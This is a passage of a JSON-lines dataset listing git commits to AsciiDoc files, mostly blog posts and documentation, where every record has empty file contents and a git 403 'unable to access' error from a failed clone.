'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"012c604a9bf41d4632cc75bf80cc2f36df6d7ba7","subject":"Update 2016-12-14-Primeiro-post.adoc","message":"Update 2016-12-14-Primeiro-post.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2016-12-14-Primeiro-post.adoc","new_file":"_posts\/2016-12-14-Primeiro-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d63bacc53d9af1c4ebc3e31f5c410db631bc2384","subject":"Release Process doc draft - #78","message":"Release Process doc draft - #78\n","repos":"richwidgets\/richwidgets","old_file":"release-process.adoc","new_file":"release-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/richwidgets\/richwidgets.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"06d7564b9f18722d4cfcdf3432826761bfd24893","subject":"Update 2016-07-25-Nodejs.adoc","message":"Update 2016-07-25-Nodejs.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-07-25-Nodejs.adoc","new_file":"_posts\/2016-07-25-Nodejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1a781ce447361bd9bbc99331c3ed63079673e4b","subject":"Update 2018-03-28-nature.adoc","message":"Update 2018-03-28-nature.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-03-28-nature.adoc","new_file":"_posts\/2018-03-28-nature.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d026707fe4f5f1aa9132897c56aec1177e23a833","subject":"Publish 2017-02-25adocadoc-part-1.adoc","message":"Publish 2017-02-25adocadoc-part-1.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adocadoc-part-1.adoc","new_file":"2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"310274cd5020fa25c5e0ac88bc3dfb4963c979fd","subject":"update the API doc","message":"update the API doc\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fa7d03034525f976ab133a49b23a1272ce256d5d","subject":"Added Asciidoc version of the man page ykpersonalize.1","message":"Added Asciidoc version of the man page ykpersonalize.1\n","repos":"Yubico\/yubikey-personalization,Yubico\/yubikey-personalization,eworm-de\/yubikey-personalization,eworm-de\/yubikey-personalization,Yubico\/yubikey-personalization-dpkg,eworm-de\/yubikey-personalization,Yubico\/yubikey-personalization-dpkg,Yubico\/yubikey-personalization-dpkg","old_file":"man\/ykpersonalize.1.adoc","new_file":"man\/ykpersonalize.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubikey-personalization.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"6cc1990e7f0b66858faa3801c85bba19bb3af68e","subject":"Update 2015-12-26-Post-Pertama-dengan-Hubpress.adoc","message":"Update 2015-12-26-Post-Pertama-dengan-Hubpress.adoc","repos":"anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io,anggadjava\/anggadjava.github.io","old_file":"_posts\/2015-12-26-Post-Pertama-dengan-Hubpress.adoc","new_file":"_posts\/2015-12-26-Post-Pertama-dengan-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anggadjava\/anggadjava.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"948b35462bc92922e4c9634b9fcba13749fb6ed7","subject":"Update 2016-04-15-A-quien-le-interese-Semana-3.adoc","message":"Update 2016-04-15-A-quien-le-interese-Semana-3.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-A-quien-le-interese-Semana-3.adoc","new_file":"_posts\/2016-04-15-A-quien-le-interese-Semana-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d3a667c8c6c03d93b4fc6be4e2e4d578f03cce1","subject":"Update 2017-01-18-ZUR-ENTSTEHUNG-DES-ATHEISMUS.adoc","message":"Update 2017-01-18-ZUR-ENTSTEHUNG-DES-ATHEISMUS.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-18-ZUR-ENTSTEHUNG-DES-ATHEISMUS.adoc","new_file":"_posts\/2017-01-18-ZUR-ENTSTEHUNG-DES-ATHEISMUS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"823d09ca835576e1365714c6713a91f43515da27","subject":"CP view","message":"CP view\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Class path\/Overview.adoc","new_file":"Class path\/Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3f0d892e044b5176752780cf859d4a94ac8ce26","subject":"Update 2015-07-18-My-summer-internship.adoc","message":"Update 2015-07-18-My-summer-internship.adoc","repos":"liyucun\/blog,liyucun\/blog,liyucun\/blog","old_file":"_posts\/2015-07-18-My-summer-internship.adoc","new_file":"_posts\/2015-07-18-My-summer-internship.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liyucun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f24f184d21679128d6017beaf5fd89f2d129469d","subject":"Update 2015-08-01-Die-Pause-ist-vorbei.adoc","message":"Update 2015-08-01-Die-Pause-ist-vorbei.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-08-01-Die-Pause-ist-vorbei.adoc","new_file":"_posts\/2015-08-01-Die-Pause-ist-vorbei.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af6a025a5aa6523bd72fc6f6c1a4259b570d7c66","subject":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","message":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16b1caade8a2916af84f22094c9d1687170099c2","subject":"Update 2016-05-13-Engineer-Career-Path.adoc","message":"Update 2016-05-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7621a9b436a35fcd3d40df60d47a3b4700002030","subject":"Added changelog.","message":"Added changelog.\n","repos":"jeffrimko\/QuickWin,jeffrimko\/QuickWin","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jeffrimko\/QuickWin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b866fa731492e5f699dd719e8d8d85c4f731cd1","subject":"Minor corrections in documentation","message":"Minor corrections in documentation\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d51586f330e3e56b380e0aa767c4e2619b1f4024","subject":"No ex Predicate (advance use)","message":"No ex Predicate (advance use)\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebc3af628922f605b69e0e73a1b7240e63b94e03","subject":"Update 2016-01-05-Personalized-Koder-MOTD.adoc","message":"Update 2016-01-05-Personalized-Koder-MOTD.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-01-05-Personalized-Koder-MOTD.adoc","new_file":"_posts\/2016-01-05-Personalized-Koder-MOTD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"011c101b7a7405c7b5242873f600e331a44dd3c8","subject":"Update 2016-05-01-First-try.adoc","message":"Update 2016-05-01-First-try.adoc","repos":"christofmarti\/blog,christofmarti\/blog,christofmarti\/blog,christofmarti\/blog","old_file":"_posts\/2016-05-01-First-try.adoc","new_file":"_posts\/2016-05-01-First-try.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/christofmarti\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"584059dce8ff796a3152d72c67e81c834e1542f7","subject":"Update 2016-07-07-A-short-article-on-database-sanity.adoc","message":"Update 2016-07-07-A-short-article-on-database-sanity.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2016-07-07-A-short-article-on-database-sanity.adoc","new_file":"_posts\/2016-07-07-A-short-article-on-database-sanity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64b0096bb371821adf4f90d07c453639ad240a5d","subject":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","message":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2878a3251930c611074acf5608de838f00d8906","subject":"Update 2015-06-21-Document-Title.adoc","message":"Update 2015-06-21-Document-Title.adoc","repos":"semarium\/blog,semarium\/blog,semarium\/blog","old_file":"_posts\/2015-06-21-Document-Title.adoc","new_file":"_posts\/2015-06-21-Document-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/semarium\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1faad2586db5b88688130bb121145da7e4797969","subject":"Update 2015-12-14-We-have-a-blog.adoc","message":"Update 2015-12-14-We-have-a-blog.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2015-12-14-We-have-a-blog.adoc","new_file":"_posts\/2015-12-14-We-have-a-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9211b5a2f07ff2f14dc29c39e7d01aff1b84ec7","subject":"Update 2015-11-22-Three-Types-of-Estimates.adoc","message":"Update 2015-11-22-Three-Types-of-Estimates.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2015-11-22-Three-Types-of-Estimates.adoc","new_file":"_posts\/2015-11-22-Three-Types-of-Estimates.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1c2795f380a292d817d1905077b0c2457bd2559","subject":"Update users.asciidoc","message":"Update users.asciidoc","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"community\/users.asciidoc","new_file":"community\/users.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c611903e0b8a4c82d1ead376d8a5ce41a4b8a277","subject":"Update 2015-03-27-a-short-stuff.adoc","message":"Update 2015-03-27-a-short-stuff.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-27-a-short-stuff.adoc","new_file":"_posts\/2015-03-27-a-short-stuff.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f73f19683c1ee2e78289262d7a63c2fce88eb3d0","subject":"Update 2016-04-08-Un-poco-de-Harding.adoc","message":"Update 2016-04-08-Un-poco-de-Harding.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f375ac8ee302d97340482b71c536d1851f19aba7","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"356ab2d105ae5afb3bf8270fd7242e0efadcbedb","subject":"add that pin has to be verified for reset retry counters","message":"add that pin has to be verified for reset retry counters\n","repos":"ato\/yubico-piv-tool,hirden\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,ato\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,hirden\/yubico-piv-tool","old_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"cc09ac0634dbd8e5a6d891ed5b0f7c6ca64fc6e0","subject":"Update 2015-10-05-So-close-yet-so-far.adoc","message":"Update 2015-10-05-So-close-yet-so-far.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_file":"_posts\/2015-10-05-So-close-yet-so-far.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"151ea7a347cabb9db640a2ee5a426841f68e0e7e","subject":"Update 2019-02-01-Word-Press-My-S-Q-L.adoc","message":"Update 2019-02-01-Word-Press-My-S-Q-L.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-01-Word-Press-My-S-Q-L.adoc","new_file":"_posts\/2019-02-01-Word-Press-My-S-Q-L.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"678f2b4278e8ff3768fb1c4d1cd0dff92aeb49cd","subject":"Fix link location","message":"Fix link location\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac5dc077c1b161f2a28b1dbf42a76a332f424a28","subject":"y2b create post The iPhone 7 Headphone Jack Is Back!","message":"y2b create post The iPhone 7 Headphone Jack Is Back!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-16-The-iPhone-7-Headphone-Jack-Is-Back.adoc","new_file":"_posts\/2016-10-16-The-iPhone-7-Headphone-Jack-Is-Back.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f49a70dd8d792a8f7c0dad98914658e92010d56f","subject":"Update 2017-07-20-Mostrando-dados-na-view-Angular-16x.adoc","message":"Update 2017-07-20-Mostrando-dados-na-view-Angular-16x.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-07-20-Mostrando-dados-na-view-Angular-16x.adoc","new_file":"_posts\/2017-07-20-Mostrando-dados-na-view-Angular-16x.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72216d46958cee3f64dd8c69a1589d446f36bd9d","subject":"y2b create post What's Hiding Inside This Google Pixel Case?","message":"y2b create post What's Hiding Inside This Google Pixel Case?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-07-Whats-Hiding-Inside-This-Google-Pixel-Case.adoc","new_file":"_posts\/2016-11-07-Whats-Hiding-Inside-This-Google-Pixel-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a35c286b649983683b01bf75948c99bdcee6fa9","subject":"Introduce tests table","message":"Introduce tests table\n","repos":"meisterluk\/screenshot-compare","old_file":"tests\/results_table.adoc","new_file":"tests\/results_table.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/meisterluk\/screenshot-compare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b41b5f39426ee59d59272252ea8a6f28160f3e7","subject":"Few words about credentials.zip with no authentication","message":"Few words about credentials.zip with no authentication\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp","old_file":"docs\/credentials.adoc","new_file":"docs\/credentials.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"ee1f9336cc70f4c8d40f68bbf0f791661758a05f","subject":"doc: users-guide: add packet drop and error CoS documentation","message":"doc: users-guide: add packet drop and error CoS documentation\n\nAdds documentation for packet drop policy and Error Class of service\n\nSigned-off-by: Balasubramanian Manoharan <affd9aba178b6c6e9aaff69252817fd03d71ae35@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"ravineet-singh\/odp,ravineet-singh\/odp,dkrot\/odp,erachmi\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,dkrot\/odp,dkrot\/odp,nmorey\/odp,erachmi\/odp,erachmi\/odp,erachmi\/odp,ravineet-singh\/odp,dkrot\/odp,nmorey\/odp,ravineet-singh\/odp,nmorey\/odp,mike-holmes-linaro\/odp,nmorey\/odp","old_file":"doc\/users-guide\/users-guide-cls.adoc","new_file":"doc\/users-guide\/users-guide-cls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b2b0b8f3e33dc5810dead9908b38c4127bee60c3","subject":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","message":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fa96673ed6515ff51cdabaa4e67d2c7d53fd11a","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"958cc42116b1f4012cc05618edac3ce53639c490","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d983b0bdfafbd71344afa27cda0474eb9d476891","subject":"Update 2015-07-23-fw4spl_01021-released.adoc","message":"Update 2015-07-23-fw4spl_01021-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-07-23-fw4spl_01021-released.adoc","new_file":"_posts\/2015-07-23-fw4spl_01021-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65b8322ad2763d27c056de855e49f6a7d6fb03a4","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78858ed4d8d8b3ad38e3bec9af2e678775dde98a","subject":"Mention in doc","message":"Mention in doc\n\nSigned-off-by: Kanstantsin Shautsou <726516dea2238e859d5028bfb21f227f655fd603@gmail.com>\n","repos":"KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"docs\/FEATURES.adoc","new_file":"docs\/FEATURES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cec999b3258d3cfa16059c76833a405428c42204","subject":"Publish 2016-10-27.adoc","message":"Publish 2016-10-27.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-10-27.adoc","new_file":"2016-10-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69d999d57df8ba7de8de9c01faac72d57226e897","subject":"Update 2017-06-17-Acemice-Belki-Hadsizce-2.adoc","message":"Update 2017-06-17-Acemice-Belki-Hadsizce-2.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-06-17-Acemice-Belki-Hadsizce-2.adoc","new_file":"_posts\/2017-06-17-Acemice-Belki-Hadsizce-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 